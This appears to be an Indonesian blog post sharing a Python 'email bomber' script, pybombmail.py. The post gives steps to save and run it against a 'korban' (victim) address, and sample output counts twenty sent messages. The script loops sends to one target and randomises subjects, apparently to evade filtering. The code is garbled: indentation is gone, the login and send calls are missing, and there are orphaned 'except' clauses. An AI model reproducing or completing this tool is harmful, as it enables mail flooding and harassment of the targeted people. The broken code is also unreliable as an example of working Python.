#pybombmail.py by aBi71
#This code for education purpose only.
#Use it at your own risk !!!
import os
import smtplib
import getpass
import sys
server = raw_input ('Server Mail: ')
user = raw_input('Username: ')
passwd = getpass.getpass('Password: ')
to = raw_input('\nTo: ')
#subject = raw_input('Subject: ')
body = raw_input('Message: ')
total = input('Number of send: ')
if server == 'gmail':
smtp_server = 'smtp.gmail.com'
port = 587
elif server == 'yahoo':
smtp_server = 'smtp.mail.yahoo.com'
port = 25
print 'Applies only to gmail and yahoo.'
print ''
server = smtplib.SMTP(smtp_server,port)
if smtp_server == "smtp.gmail.com":
for i in range(1, total+1):
subject = os.urandom(9)
msg = 'From: ' + user + '\nSubject: ' + subject + '\n' + body
print "\rTotal emails sent: %i" % i
print '\n Done !!!'
except KeyboardInterrupt:
print '[-] Canceled'
except smtplib.SMTPAuthenticationError:
print '\n[!] The username or password you entered is incorrect.'
Cara Save :
1. Buka Terminal ketik cd Desktop ( untuk menyimpan di Desktop )
2. Copy script di atas
3. ketik nano ebomb.py lalu paste , keluar dengan Ctrl + x - y - enter
Cara menggunakan :
1 . cd Desktop
2. chmod 755 *
3. ./ebomb.py
4. - server mail ( contoh gmaildi isi dengan gmail )
- username ( alamat email anda )
- Password ( password email anda )
- to ( email korban )
- message ( pesan anda )
- Number of send ( jumlah pesan yang akan di kirim )
Contoh output jika berhasil :
Total emails sent: 1
Total emails sent: 2
Total emails sent: 3
Total emails sent: 4
Total emails sent: 5
Total emails sent: 6
Total emails sent: 7
Total emails sent: 8
Total emails sent: 9
Total emails sent: 10
Total emails sent: 11
Total emails sent: 12
Total emails sent: 13
Total emails sent: 14
Total emails sent: 15
Total emails sent: 16
Total emails sent: 17
Total emails sent: 18
Total emails sent: 19
Total emails sent: 20
Done !!!
Selamat mencoba!
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